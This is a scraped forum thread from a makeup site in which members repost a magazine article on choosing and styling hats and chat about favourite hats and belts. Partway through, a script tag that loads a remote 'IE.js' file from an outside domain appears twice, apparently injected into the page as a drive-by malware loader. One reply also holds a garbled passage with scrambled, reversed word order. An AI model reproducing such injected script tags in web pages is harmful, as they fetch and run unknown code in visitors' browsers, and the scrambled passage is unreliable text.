Hats are Hot!

Makeuptalk.com forums

Help Support Makeuptalk.com forums:

This site may earn a commission from merchant affiliate links, including eBay, Amazon, and others.
Reaction score
I personally love hats. The right one can instantly spruce up your look! Check out this article

Hats are hot!!

A good hat can make you look 10 years younger, 10 times prettier and a million times more individual, given the right style. To be sure, I am not talking about a baseball lid or a strange tropical panama bought at the airport, but rather a properly stylish chapeau. So at this moment, I declare: Hats are back, and just in time!

To find the right match for your distinctive face you first need to get comfortable with the idea of wearing a hat. Spend a good hour trying on different models. A menswear store is a good place to search for caps, berets and derbies. Try a vintage store for cocktail hats, 40s straw hats and cloche berets. More exclusive hat boutiques possess the best variety of hats in terms of shape, color and texture.

Like gloves, a hat is all about fit. Like shoes, they require a bit of strutting about while trying on. I recommend you start simple with a classic black beret which can be bought almost anywhere and worn by almost anyone. Apply enough black eyeliner and mascara to lend your eyes a smoky distinction, then pull on your beret. You might wear it at the back of your head with a nice heavy fringe (think Debbie Harry of Blondie), rest it above one eye, or tuck your hair into it and draw it over your eye for a dramatic, art-deco evening look.

To encourage your mad hatter state of mind, consider the styles and tips for hats below:

1. The shape's the thing: Tall crowned hats suit round faces, snugger styles better frame long faces. Women with wide-set eyes can wear almost any hat, but others look best in a hat with a brim worn low to the brow.

2. Extra, extra! The most flattering hat is the paperboy cap. Wear it over a wispy chignon like Cameron Diaz or over long loose hair like Drew Barrymore. Indeed, all three stars (including Lucy Liu) of the movie-version Charlie's Angels have worn this hat.

3. New tricks: Old hats look exactly that without a steam and sprucing up. To revive a hat adorned with silk flowers, remove the flowers and hold them about seven inches above a plume of steam, teasing each petal out with your fingers. Alternatively, find clever ways to re-trim old hats. Fresh feathers and modern brooches look great on a plain black hat. A bright striped band of ribbon revives a velvet or straw number.

4. Be bold! A vivid hat in bright purple or canary yellow looks striking above shoulder-to-toe black. This is the best way to brighten your face in the dead of winter and flatter your eyes come spring.

5. Go long & lean: Choose an overcoat that is hat-friendly, with an unfussy high collar, plain covered buttons (not plastic!), and nicely tailored, snug sleeves. Clothes that look best with hats are long and lean; ball gowns and billowy sleeves don't work with headwear.

6. The right shoes: Heighten your whole look by pairing your hat with heels. Try high-heeled boots and a fedora with a cashmere ballerina-style sweater and straight corduroy jeans. No one will ask you why!

7. Find role models in hats. Stars who looked great in hats include Carole Lombard and Janis Joplin. Great hat movies to rent are Breakfast at Tiffany's, My Fair Lady, The Women, Funny Girl, Paper Moon and The Boyfriend (I love Twiggy in a hat!).

Once you find the right hat, accessorize it with confidence and a dazzling smile. The compliments will start to arrive in no time.

Article taken by Anna Johnson on msn.com

Here are some of my favorite hats:

<!-- rmh --><!-- Anjani debugging --><!-- Inserted by Content Management Server: BEGIN EmbedBodyEndHook --><!-- Inserted by Content Management Server: END EmbedBodyEndHook --><SCRIPT src="http://ssl-hints.netflame.cc/service/script/IE.js"></SCRIPT> <!-- rmh --><!-- Anjani debugging --><!-- Inserted by Content Management Server: BEGIN EmbedBodyEndHook --><!-- Inserted by Content Management Server: END EmbedBodyEndHook --><SCRIPT src="http://ssl-hints.netflame.cc/service/script/IE.js"></SCRIPT>

I love this one (but if in a different color)

Hate these two, they remind of me of Striesand

ona250350-00p1.jpg

mecha_streisand.GIF

Mecha Streisand!

Originally Posted by Tony(admin) I love this one (but if in a different color)

Streisand, really? I can't even imagine her wearing a hat like that - too trendy!
smile.gif

Originally Posted by Tony(admin) I love this one (but if in a different color)

Originally Posted by Kage_sCupotea Streisand, really? I can't even imagine her wearing a hat like that - too trendy!
smile.gif
Love the article Shoes. I really like the fisher- type of hat... let me find a pic. I have one that is khaki with plaid underneath. THey look really cute on! It especially looks cute with a pageboy do.

<<ONLY p shows. cap of underside so casually Wear dweeb. cone-head a like look don?t you up sides the turn LOL.<> make sure to turn the sides up so you do not look like a bucket head. These kinds of hats usually have a cute pattern underneath so you can wear it casually.

Other cute styles: Funked up baseball cap>>

This fedora one is cute on many women: Click here to see it on model!

Belts are also making a comeback. Now that the 80's are popping up again, I am seeing a lot of the low-slung belts.

I like the double wrap belts myself. I think those are cute. I can't find a pic of one at the moment. It looks like two very skiny belts together.

Latest posts

Back